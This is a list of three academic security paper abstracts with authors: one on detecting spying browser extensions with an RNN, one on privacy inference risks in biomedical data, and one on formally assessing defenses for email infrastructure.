I Spy with My Little Eye: Analysis and Detection of Spying Browser Extensions
Anupama Aggarwal (IIIT - Delhi, India), Saravana Kumar (CEG, Guindy, India), Bimal Viswanath (UC Santa Barbara), Liang Zhang (Northeastern University), Ayush Shah (IIIT - Delhi, India), Ponnurangam Kumaraguru (IIIT - Delhi, India)
In this work, we take a step towards understanding and defending against spying browser extensions. These are extensions repurposed to capture online activities of a user and communicate the collected sensitive information to a third-party domain. We conduct an empirical study of such extensions on the Chrome Web Store. First, we present an in-depth analysis of the spying behavior of these extensions. We observe that these extensions steal a variety of sensitive user information, such as the complete browsing history (e.g., the sequence of web traversals), online social network (OSN) access tokens, IP address, and geolocation. Second, we investigate the potential for automatically detecting spying extensions by applying machine learning schemes. We show that using a Recurrent Neural Network (RNN), the sequence of browser API calls made by an extension can be a robust feature, outperforming hand-crafted features (used in prior work on malicious extensions) to detect spying extensions. Our RNN based detection scheme achieves a high precision (90.02%) and recall (93.31%) in detecting spying extensions.
Dissecting Privacy Risks in Biomedical Data
Pascal Berrang (CISPA, Saarland University), Mathias Humbert (Swiss Data Science Center, ETH/EPFL), Yang Zhang (CISPA, Saarland University), Irina Lehmann (Helmholtz Centre for Environmental Research Leipzig, UFZ, Leipzig), Roland Eils (German Cancer Research Center (DKFZ) & University of Heidelberg), Michael Backes (CISPA, Saarland University)
The decreasing costs of molecular profiling has fueled the biomedical research community with a plethora of new types of biomedical data, enabling a breakthrough towards a more precise and personalized medicine. However, the release of these intrinsically highly sensitive data poses a new severe privacy threat. While biomedical data is largely associated with our health, there also exist various correlations between different types of biomedical data, along the temporal dimension, and also in-between family members. However, so far, the security community has focused on privacy risks stemming from genomic data, largely overlooking the manifold interdependencies between other biomedical data. In this paper, we present a generic framework for quantifying the privacy risks in biomedical data taking into account the various interdependencies between data (i) of different types, (ii) from different individuals, and (iii) at different time. To this end, we rely on a Bayesian network model that allows us to take all aforementioned dependencies into account and run exact probabilistic inference attacks very efficiently. Furthermore, we introduce a generic algorithm for building the Bayesian network, which encompasses expert knowledge for known dependencies, such as genetic inheritance laws, and learns previously unknown dependencies from the data. Then, we conduct a thorough inference risk evaluation with a very rich dataset containing genomic and epigenomic data of mothers and children over multiple years. Besides effective probabilistic inference, we further demonstrate that our Bayesian network model can also serve as a building block for other attacks. We show that, with our framework, an adversary can efficiently identify the parent-child relationships based on methylation data with a success rate of 95%.
Formally Reasoning about the Cost and Efficacy of Securing the Email Infrastructure
Patrick Speicher (CISPA, Saarland University), Marcel Steinmetz (CISPA, Saarland University), Robert Künnemann (CISPA, Saarland University), Milivoj Simeonovski (CISPA, Saarland University), Giancarlo Pellegrino (CISPA, Saarland University), Jörg Hoffmann (CISPA, Saarland University), Michael Backes (CISPA, Saarland University)
Security in the Internet has historically been added post-hoc, leaving services like email, which, after all, is used by 3.7 billion users, vulnerable to large-scale surveillance. For email alone, there is a multitude of proposals to mitigate known vulnerabilities, ranging from the introduction of completely new protocols to modifications of the communication paths used by big providers. Deciding which measures to deploy requires a deep understanding of the induced benefits, the cost and the resulting effects. This paper proposes the first automated methodology for making formal deployment assessments. Our planning algorithm analyses the impact and cost-efficiency of different known mitigation strategies against an attacker in a formal threat model. This novel formalisation of an infrastructure attacker includes routing, name resolution and application level weaknesses. We apply the methodology to a large-scale scan of the Internet, and assess how protocols like IPsec, DNSSEC, DANE, SMTP STS, SMTP over TLS and other mitigation techniques like server relocation can be combined to improve the confidentiality of email users in 45 combinations of attacker and defender countries and nine cost scenarios. This is the first deployment analysis for mitigation techniques at this scale.